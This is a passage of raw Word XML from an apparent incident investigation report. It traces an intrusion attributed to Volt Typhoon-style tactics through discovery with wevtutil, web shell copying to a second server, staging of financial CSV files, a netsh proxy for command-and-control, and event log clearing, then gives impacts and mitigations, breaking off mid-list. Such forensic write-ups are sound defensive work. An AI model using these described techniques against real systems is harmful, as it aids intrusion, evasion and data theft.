          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>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755900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="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title=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2755900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>The encoded command decoded  from cyberchef.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="discovery-and-lateral-movement"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Discovery and Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">For discovery, the attacker used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wevtutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to search for event IDs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>4624 4625 4769</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. During lateral movement to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>server-02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, they copied the original web shell and created a new one named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
        <w:t>AuditReport.jspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>70485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2196465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2196465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>They copied the original web shell iisstart.aspx from C:\Windows\Temp to create a new one named AuditRport.jspx in the \\server-02\C$\inetpub\wwwroot\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:fill="FFFFA6" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="collection"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">During collection, the attacker copied three financial files: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2022.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2023.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2024.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>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1883410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1883410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor behindDoc="0" distT="635" distB="635" distL="635" distR="635" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-167005</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>835660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5431155" cy="783590"/>
                <wp:effectExtent l="635" t="635" r="635" b="635"/>
                <wp:wrapNone/>
                <wp:docPr id="10" name="Bézier curve 2"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5431320" cy="783720"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="textAreaLeft" fmla="*/ 0 w 3079080"/>
                            <a:gd name="textAreaRight" fmla="*/ 3079440 w 3079080"/>
                            <a:gd name="textAreaTop" fmla="*/ 0 h 444240"/>
                            <a:gd name="textAreaBottom" fmla="*/ 444600 h 444240"/>
                          </a:gdLst>
                          <a:ahLst/>
                          <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
                          <a:pathLst>
                            <a:path fill="none" w="15087" h="2177">
                              <a:moveTo>
                                <a:pt x="26" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="60" y="284"/>
                                <a:pt x="7" y="560"/>
                                <a:pt x="0" y="847"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-7" y="1129"/>
                                <a:pt x="106" y="1378"/>
                                <a:pt x="370" y="1562"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="661" y="1764"/>
                                <a:pt x="961" y="1787"/>
                                <a:pt x="1243" y="1932"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1543" y="2087"/>
                                <a:pt x="1855" y="2040"/>
                                <a:pt x="2169" y="2144"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="2506" y="2255"/>
                                <a:pt x="2847" y="2057"/>
                                <a:pt x="3201" y="2064"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="3559" y="2071"/>
                                <a:pt x="3898" y="1908"/>
                                <a:pt x="4259" y="1879"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="4533" y="1857"/>
                                <a:pt x="4804" y="1856"/>
                                <a:pt x="5080" y="1853"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="5394" y="1849"/>
                                <a:pt x="5716" y="1853"/>
                                <a:pt x="6032" y="1853"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="6332" y="1853"/>
                                <a:pt x="6632" y="1828"/>
                                <a:pt x="6932" y="1853"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="7247" y="1878"/>
                                <a:pt x="7565" y="1880"/>
                                <a:pt x="7884" y="1879"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="8200" y="1878"/>
                                <a:pt x="8517" y="1861"/>
                                <a:pt x="8837" y="1853"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="9114" y="1845"/>
                                <a:pt x="9380" y="1833"/>
                                <a:pt x="9657" y="1826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="9985" y="1817"/>
                                <a:pt x="10308" y="1801"/>
                                <a:pt x="10636" y="1800"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="10967" y="1798"/>
                                <a:pt x="11304" y="1800"/>
                                <a:pt x="11641" y="1800"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="11913" y="1800"/>
                                <a:pt x="12192" y="1755"/>
                                <a:pt x="12461" y="1800"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="12781" y="1852"/>
                                <a:pt x="13098" y="1808"/>
                                <a:pt x="13414" y="1853"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="13774" y="1903"/>
                                <a:pt x="14125" y="1761"/>
                                <a:pt x="14472" y="1826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="14906" y="1907"/>
                                <a:pt x="14908" y="1470"/>
                                <a:pt x="15028" y="1244"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="15161" y="994"/>
                                <a:pt x="15028" y="715"/>
                                <a:pt x="15028" y="450"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="15028" y="344"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:noFill/>
                        <a:ln w="0">
                          <a:solidFill>
                            <a:srgbClr val="ff4000"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0"/>
                        <a:fillRef idx="0"/>
                        <a:effectRef idx="0"/>
                        <a:fontRef idx="minor"/>
                      </wps:style>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict/>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="c2-and-cleanup"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>C2 and Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">For command-and-control, the attacker used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to configure a proxy with connect address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>10.2.30.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. To reduce evidence, the attacker cleared the following event log typ</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="12">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>123825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1540510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="1492250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1492250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">es: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="screenshot-placeholders"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="283"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="283"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="283"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This investigation highlights a sophisticated attack chain consistent with Volt Typhoon’s tactics, demonstrating stealth, persistence, and the effective abuse of native system tools (LOLBins) to evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The overall impact on the compromised environment was substantial. The attacker achieved unauthorized administrative access, created a persistent foothold through web shells, and moved laterally between servers. Critical systems were exposed, including the Active Directory database, which was copied and archived. The use of credential-dumping tools strongly indicates that multiple user credentials may have been compromised, potentially enabling further unauthorized access beyond the initially affected systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In terms of data exposure, the attacker successfully collected and staged sensitive financial data, specifically the files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2022.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2023.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2024.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Additionally, the exfiltration risk extends to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Active Directory database contents (NTDS.dit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Cached or harvested credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>System and configuration data gathered during reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">These actions indicate both </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>data theft</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>long-term access capability</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, increasing the overall severity of the incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To reduce the likelihood and impact of similar attacks in the future, the following security improvements are recommended:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Enhance Logging &amp; Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enable advanced logging for PowerShell, WMI, and command-line activity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Centralize logs in a SIEM and actively monitor for anomalies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Strengthen Access Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enforce least privilege principles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Regularly audit administrative accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Implement Multi-Factor Authentication (MFA), especially for privileged users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
